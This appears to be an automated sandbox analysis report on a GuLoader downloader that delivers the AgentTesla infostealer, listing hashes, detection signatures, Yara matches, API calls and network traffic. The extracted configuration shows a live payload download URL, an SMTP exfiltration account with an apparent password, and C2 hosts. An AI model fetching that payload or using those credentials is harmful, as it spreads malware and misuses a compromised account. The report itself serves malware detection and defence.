
Windows Analysis Report
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Overview

General Information

Sample Name: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
Analysis ID: 635379
MD5: e2e4196b84fdf8956baa7f99b11812af
SHA1: 7af0382928364f2fc088d13f96394f4d83bd01ae
SHA256: 7004d20bac532e4a93f138bae6da90223d850992fd1c88ba176bc9349b802c6a

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe" MD5: E2E4196B84FDF8956BAA7F99B11812AF)
    • CasPol.exe (PID: 8356 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
Extracted malware configuration (AgentTesla): {"Exfil Mode": "SMTP", "SMTP Info": "fugen.ozkunt@paralikgroup.comFug1966Ozkmail.paralikgroup.comsaleseuropower2@yandex.com"}
Extracted malware configuration (GuLoader): {"Payload URL": "http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin"}
Source | Rule | Description | Author | Strings
00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen | matched strings:
  • 0x31238:$s10: logins
  • 0x41758:$s11: credential
  • 0x1e4a:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
  • 0x2995:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
  • 0x1f6b:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
00000003.00000000.37160550415.0000000000B10000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
          No Sigma rule has matched
          No Snort rule has matched



          AV Detection

Source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin"}
Source: conhost.exe.4512.4.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fugen.ozkunt@paralikgroup.comFug1966Ozkmail.paralikgroup.comsaleseuropower2@yandex.com"}
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Virustotal: Detection: 21%
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb | source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 | source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_0040290B FindFirstFileW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_0040699E FindFirstFileW,FindClose,

          Networking

Source: Malware configuration extractor | URLs: http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin
Source: Joe Sandbox View | ASN Name: COGENT-174US
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: global traffic | HTTP traffic detected: GET /paralikgroup%20ori%204_vJdEAWVzP17.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: artist151sh.com | Cache-Control: no-cache
Source: global traffic | TCP traffic: 192.168.11.20:49777 -> 173.254.28.216:587
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000003.00000002.42077179200.000000001D152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: [long browser user-agent policy JSON fragment omitted]
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000003.00000002.42052443379.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ckatRU.com
Source: user-not-tracked-symbolic.svg.1.dr | String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | String found in binary or memory: http://creativecommons.org/ns#
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | String found in binary or memory: http://creativecommons.org/ns#Attribution
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | String found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | String found in binary or memory: http://creativecommons.org/ns#Distribution
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | String found in binary or memory: http://creativecommons.org/ns#Notice
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | String found in binary or memory: http://creativecommons.org/ns#Reproduction
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | String found in binary or memory: http://creativecommons.org/ns#ShareAlike
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.paralikgroup.com
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, Toelike.exe.3.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://8tHZzAc0TjNm.org
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://8tHZzAc0TjNm.orgt-Wl
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://8tHZzAc0TjNm.orgx
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42077179200.000000001D152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: artist151sh.com
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          System Summary

Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF94FF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF946C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF95D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF96AF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01132B98
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325FB02 NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325E349 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325FFD2 NtResumeThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00B1DDAE NtCreateThreadEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 98%
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameThrottlePlugin.dllL vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeVirustotal: Detection: 21%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeJump to behavior
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | File created: C:\Users\user\AppData\Local\Temp\nss7448.tmp
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/13@2/2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | File written: C:\Users\user\AppData\Local\Temp\HERMAPHRODEITY.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb | source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 | source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr

          Data Obfuscation

          Source: Yara match | File source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.37160550415.0000000000B10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_713D30C0 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03252B6D push edi; iretd
